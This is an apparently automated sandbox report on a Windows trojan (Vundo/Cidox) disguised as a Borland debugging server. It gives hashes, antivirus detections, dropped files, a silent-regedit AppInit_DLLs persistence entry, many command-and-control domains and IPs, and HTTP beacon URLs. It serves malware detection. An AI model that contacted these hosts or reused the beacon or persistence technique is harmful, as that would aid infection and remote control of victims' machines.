Analysis Date: 2015-01-06 15:29:40
MD5: b4d83993aabaec10b2329096de9497ca
SHA1: e55a6ed211b62f493f0f00fceb975a5e27f79dd0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: dad271b0925d710fe2596bf9e74126d7 sha1: 524f63c4dccca5e202d825af920829cca1aac49e size: 90624
Section _ASM2  md5: 58043d02ccf8f9ae866cea43ce553b29 sha1: 7eaf1194e20f44f3da8923d46953c768b5819ee9 size: 62976
Section .rdata md5: a3e757bb04ccd96244fe0b072fc44fe9 sha1: 4c8a2d6f0fd9c72c872af58268a373a579cc5d79 size: 7680
Section .data  md5: 3a1f36d197422dd28a87e9236978c8e9 sha1: 6ce8c5ad6adace77e9eabd4cdc4bd9fea4dfcfb8 size: 5120
Section .tls   md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc  md5: 60e55ce07d03081b805655faddaed3dc sha1: 087f641996e1031fad80ef5e6c8ef37b35450b9b size: 17920
Timestamp: 2012-09-19 16:55:32
Version:
  LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
  InternalName: BORDBG61
  FileVersion: 70.08.08.1442
  CompanyName: Borland Software Corporation
  ProductName: Borland Remote Debugging Server
  ProductVersion: 51.00
  FileDescription: Borland Remote Debugging Server
  OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: e8c3d33c4325ab07a10692937bbc050a27d94aa0
IMPhash: 4ee4fcb1e8f606f7897286b8d895d4d5
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Kazy.211341
AV Alwil (avast): Vundo-XK [Trj]
AV Arcabit (arcavir): Gen:Variant.Kazy.211341
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Vundo.Gen8
AV BullGuard: Gen:Variant.Kazy.211341
AV CA (E-Trust Ino): Win32/Vundo.N!generic
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: no_virus
AV Dr. Web: Trojan.Mayachok.17761
AV Emsisoft: Gen:Variant.Kazy.211341
AV Eset (nod32): Win32/Citirevo.AD
AV Fortinet: W32/Citirevo.AB!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.211341
AV Grisoft (avg): Generic_r.BGI
AV Ikarus: Trojan-Downloader.Win32.Vundo
AV K7: Backdoor ( 04c4f2bf1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Agent
AV McAfee: Vundo-FASV!B4D83993AABA
AV Microsoft Security Essentials: TrojanDownloader:Win32/Vundo.J
AV MicroWorld (escan): Gen:Variant.Kazy.211341
AV Rising: no_virus
AV Sophos: Mal/Vundo-K
AV Symantec: Trojan.Gen
AV Trend Micro: TROJ_VUNDO.SMKK
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\lxmolud.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: flersomstk.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\lxmolud.dll\\x00

Network Details:

DNS instrango.com (Type: A) ➝ 204.11.56.45
DNS denadb.com (Type: A) ➝ 204.11.56.45
DNS foradns.com (Type: A) ➝ 141.8.225.62
DNS flersomstk.com (Type: A)
DNS getavodes.com (Type: A)
DNS tryatdns.com (Type: A)
DNS fescheck.com (Type: A)
DNS netrovad.com (Type: A)
DNS nsknock.com (Type: A)
DNS terrans.su (Type: A)
DNS tegimode.com (Type: A)
DNS clickstano.com (Type: A)
DNS denareclick.com (Type: A)
DNS clickbeta.ru (Type: A)
DNS nshouse1.com (Type: A)
DNS clickclans.ru (Type: A)
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9NmWegMFhYXRx
  User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9NvWhAgoiEbt3
  User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9NvsEuqhnnjpb
  User-Agent:
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9Num+Q3bcsFbm
  User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1032 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.62:80
Flows TCP: 192.168.1.1:1034 ➝ 91.233.89.106:80
